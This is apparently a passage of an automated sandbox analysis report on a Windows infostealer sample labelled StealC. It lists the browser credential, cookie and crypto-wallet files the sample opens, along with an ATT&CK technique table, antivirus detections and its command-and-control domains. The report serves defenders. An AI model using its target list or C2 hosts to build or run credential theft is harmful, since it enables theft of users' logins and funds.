              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exe Directory queried: number of queries: 1001
              Source: Yara match File source: Process Memory Space: QQ5BxgG5G6.exe PID: 7792, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: Process Memory Space: QQ5BxgG5G6.exe PID: 7792, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count shown next to that technique in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 34 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Query Registry; 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 223 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection (Source | Detection | Scanner | Label)
QQ5BxgG5G6.exe | 57% | Virustotal
QQ5BxgG5G6.exe | 61% | ReversingLabs | Win32.Ransomware.StealC
QQ5BxgG5G6.exe | 100% | Avira | TR/Crypt.XPACK.Gen
QQ5BxgG5G6.exe | 100% | Joe Sandbox ML
No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
cuddlyready.xyz | 104.21.32.96 | true | false | | high
Domains and URLs from the malware configuration (Name | Malicious | Antivirus Detection | Reputation)
sendypaster.xyz | false | | high
cuddlyready.xyz | true | | unknown
steppriflej.xyz | false | | high
ripe-blade.cyou | false | | high
greywe-snotty.cyou | false | | high
https://cuddlyready.xyz/api | true | | unknown
smash-boiling.cyou | false | | high
supporse-comment.cyou | false | | high
hosue-billowy.cyou | false | | high
pollution-raker.cyou | false | | high
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation)
https://cuddlyready.xyz/Z | QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cuddlyready.xyz/a8 | QQ5BxgG5G6.exe, 00000000.00000003.1580143357.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579237767.0000000001635000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cuddlyready.xyz/apis | QQ5BxgG5G6.exe, 00000000.00000002.1635634925.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634334937.00000000015CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cuddlyready.xyz:443/apil | QQ5BxgG5G6.exe, 00000000.00000002.1635508382.0000000001593000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cuddlyready.xyz/api/ | QQ5BxgG5G6.exe, 00000000.00000003.1530950088.0000000005CDE000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1530842219.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://cuddlyready.xyz/pi | QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cuddlyready.xyz/ | QQ5BxgG5G6.exe, 00000000.00000003.1579286191.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cuddlyready.xyz/h | QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993. | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44 | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cuddlyready.xyz:443/api | QQ5BxgG5G6.exe, 00000000.00000003.1633788926.0000000001593000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cuddlyready.xyz/pi0 | QQ5BxgG5G6.exe, 00000000.00000002.1635838883.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1597421580.0000000001635000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634399768.0000000001634000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.micro | QQ5BxgG5G6.exe, 00000000.00000003.1580254004.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1557425029.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1633788926.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1483903137.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1579432168.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1634153690.00000000015FB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cuddlyready.xyz// | QQ5BxgG5G6.exe, 00000000.00000003.1509661602.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509917557.0000000005CCB000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1509507807.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | QQ5BxgG5G6.exe, 00000000.00000003.1531588114.0000000005D04000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | QQ5BxgG5G6.exe, 00000000.00000003.1533324823.0000000005CDA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | QQ5BxgG5G6.exe, 00000000.00000003.1532791350.0000000005F7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | QQ5BxgG5G6.exe, 00000000.00000003.1486369221.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486143624.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp, QQ5BxgG5G6.exe, 00000000.00000003.1486465184.0000000005C88000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
